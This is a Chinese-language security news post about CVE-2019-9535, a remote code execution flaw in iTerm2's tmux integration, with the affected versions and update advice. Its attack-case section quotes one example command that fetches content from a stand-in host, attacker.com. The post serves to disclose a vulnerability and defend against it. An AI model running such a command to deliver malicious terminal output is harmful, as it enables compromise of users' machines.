用Mac的同志请警惕!你可能做了黑客七年的肉鸡!

v2-d80d8aae9fbd74a93cd858c1094312a7_1200x500.jpg

由 网络安全公司 (ROS) 发布的审计结果显示, iTerm 2 中存在一个严重的远程代码执行 (RCE) 漏洞,且至少已存在7年,知晓此漏洞的黑客,可以对存在漏洞的目标进行任意控制。

iTerm 2 简介

iTerm2 是全球最热门的终端模拟器之一,是开发人员经常使用的 MacOS 终端工具,是 Mac 内置终端 app 最有力的热门开源工具替代品之一,被很多开发人员称为“Mac 终端利器”。

漏洞概述

CVE 编号:CVE-2019-9535。

该漏洞描述:ROS 在iTerm2 的 tmux集成功能中找到了一个至少已存在7年之久的严重漏洞。黑客如果能输出终端,则在很多情况下能够在目标计算机上执行命令。

攻击案例:使目标连接到由攻击者控制的 SSH 服务器或其他恶意命令

curl http://attacker.com and tail -f /var/log/apache2/referer_log

Nachman 认为该漏洞影响的iTerm2 用户数量介于10万至20万之间。

Mozilla 公司的安全工程师 Tom Ritter 指出,这个漏洞源自 iTerm2 中的 tmux 集成功能。Tumx 应用程序是一款终端多路复用器,可允许从单个设备创建并控制多个终端。

CERT 协调中心发布漏洞通知表示,可通过使用命令行工具在终端屏幕上打印由攻击者控制的内容,从而利用该漏洞。该中心指出,“潜在的攻击向量包括通过 ssh 连接至恶意服务器,通过curl 获取恶意网站,或者通过 tail –f 跟踪包含某些恶意内容的日志文件。”

一般情况下,该漏洞需要某些用户交互或伎俩才能遭触发,但由于它可通过通常被认为是安全的命令利用,因此它的潜在影响力巨大。

影响版本

该漏洞影响于本周早些时候发布的 3.3.5 版本及之前版本。

修复方案

v2-aaed4684dfc760832d0d474b3ab2a2f1_hd.jpg

目前补丁已发布但自动更新尚未推送,立即在 iTerm2 目录中选择“检查新版本”手动更新至最新版本 3.3.6,即可修复该漏洞啦!

打赏

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码打赏,你说多少就多少

打开微信扫一扫,即可进行扫码打赏哦

分享到
  • QQ好友
  • 微信好友
  • 新浪微博